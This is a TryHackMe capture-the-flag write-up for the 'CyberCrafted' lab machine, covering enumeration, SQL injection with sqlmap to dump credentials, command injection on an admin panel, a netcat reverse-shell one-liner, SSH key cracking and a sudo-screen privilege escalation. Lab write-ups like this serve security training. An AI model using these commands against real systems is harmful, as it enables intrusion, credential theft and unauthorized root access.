CyberCrafted Walkthrough En | TryHackMe – Write-up
Pwn this pay-to-win Minecraft server!
CyberCrafted is a CTF from TryHackMe, Medium level, it requires a fairly extensive enumeration. It remains accessible even for beginners. The escalation of privilege is pretty cool.
Enumeration
Command :
nmap -T5 10.10.235.114
3 ports are openSSH, HTTP, and port 25565which hosts the Minecraft game.
Web enumeration
dirsearch -u 10.10.181.45
Dirsearch gives us the domain name of the website : http://cybercrafted.thm/
Adding the domain name to the hosts file.
echo ‘10.10.181.45 cybercrafted.thm’ >> /etc/hosts
Sub-domains enumeration :
Command :
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H “Host: FUZZ.cybercrafted.thm/” -u http://cybercrafted.thm/ -fs 0
There are three subdomains that need to be enumerated with dirsearch. First, they must be added to the host file.
Enumeration on vhost (store and admin):
Command :
dirsearch -u http://admin.cybercrafted.thm/
The site http: //admin.cybercrafted.thm/login.php, asks for identifiers that we do not have. In addition, access does not appear to be vulnerable. (no bypass authentication)
dirsearch -u http://store.cybercrafted.thm/
On the site http: //store.cybercrafted.thm/search.php, we have the possibility to perform a search. This page is vulnerable to sql injection (sqli).
To do this automatically, you must intercept the request for a search in BurpSuite. Once intercepted, it must be saved and used in sqlmap.
Initial command to test the vulnerability :
sqlmap -r req.req
Final command (dump credentials) :
sqlmap -r req.req –dbms=mysql -D webapp -T admin –dump
By copying the hash on the site https://crackstation.net/ , we get the password.
Access to the admin.cybercrafted.thm /login.php site
On the site we have the possibility to enter orders.
Command :
id
Initial foothold
Since you can pass system commands, chances are you can get a reverse_shell.
Command :
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.38.124 1234 > f
Movement lateral www-data- xXUltimateCreeperXx
Once the reverse_shell has been received on nc, we are with the www-data account. In the /home folder is the account xXUltimateCreeperXx, in which a nice private key id_rsa is present.
Command :
ssh xXUltimateCreeperXx@127.0.0.1 -i id_rsa
The private key is encrypted by a passphrase. To decipher it, you have to use ssh2john. Before, we will copy it locally to kali.
Command :
scp id_rsa root@10.11.38.124:/root/trytohackme/cybercraft/
Command to crack the key :
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
Movement lateral xXUltimateCreeperXx - cybercrafted
Once on the xXUltimateCreeperXx account and in view of the questions asked by tryhackme, you have to find the location of the Minecraft games.
It is in /opt (nothing too rocket science)
After listing the subfolders and files, the password for the cybercrafted account can be found in the following path /opt/minecraft/cybercrafted/plugins/LoginSystem/log.txt
Command to switch to cybercrafted account :
su cybercrafted
Privilege Escalation:
First command to made :
sudo -l
The user has root rights to execute the command /usr/bin/screen -r cybercrafted
Command :
sudo /usr/bin/screen -r cybercrafted
And we get this window :
To switch to the root account, you have to make these keyboard shortcuts.
crtl a then do ctrl c
#
That’s all folks
Thank you for taking the trouble to come to the site to read this Write Up
Hope he got you more and taught you new things.
Please feel free to leave a comment or share this article.
